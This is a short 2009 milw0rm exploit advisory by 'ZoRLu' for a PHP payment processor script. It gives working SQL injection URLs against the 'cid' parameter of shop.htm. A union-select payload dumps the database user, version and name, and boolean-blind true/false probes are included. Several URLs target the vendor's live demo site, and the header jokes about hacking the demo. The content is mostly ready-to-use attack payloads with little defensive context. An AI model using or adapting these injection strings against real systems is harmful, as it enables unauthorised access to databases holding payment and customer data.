Payment Processor Script (shop.htm cid) SQL Injection Vulnerability :

Date : 2009-08-03 Author : ZoRLu
[~] PaymentProcessorScript.net R-Sql/B-Sql Multiple Vulns.
[~]
[~]----------------------------------------------------------
[~] Discovered By: ZoRLu  msn: [email protected]
[~]
[~] Date: 04.01.09
[~]
[~] Home: z0rlu.blogspot.com / www.experl.com 
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] EN ONEMLi N0T: demolarI hackleyen top olsun top ( if you hack demo you will be ball xD )
[~] -----------------------------------------------------------

R-Sql

http://z0rlu.blogspot.com/shop.htm?cid=999999999+union+select+1,2,concat(user(),0x3a,version(),0x3a,database())

for demo:

http://paymentprocessorscript.net/demo/shop.htm?cid=999999999+union+select+1,2,concat(user(),0x3a,version(),0x3a,database())

B-Sql

http://z0rlu.blogspot.com/shop.htm?cid=[id]+and+1=1    true

http://z0rlu.blogspot.com/shop.htm?cid=[id]+and+1=100  false

for demo:

http://paymentprocessorscript.net/demo/shop.htm?cid=31+and+1=1

http://paymentprocessorscript.net/demo/shop.htm?cid=31+and+1=100


[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & Scriptorium & h4ckinger & Cyber_Thief & BLaSTeR & Ahmet and all experl.com users  :) 
[~]
[~] yildirimordulari.org  &  experl.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2009-08-03]

C1

 

C2

 

C3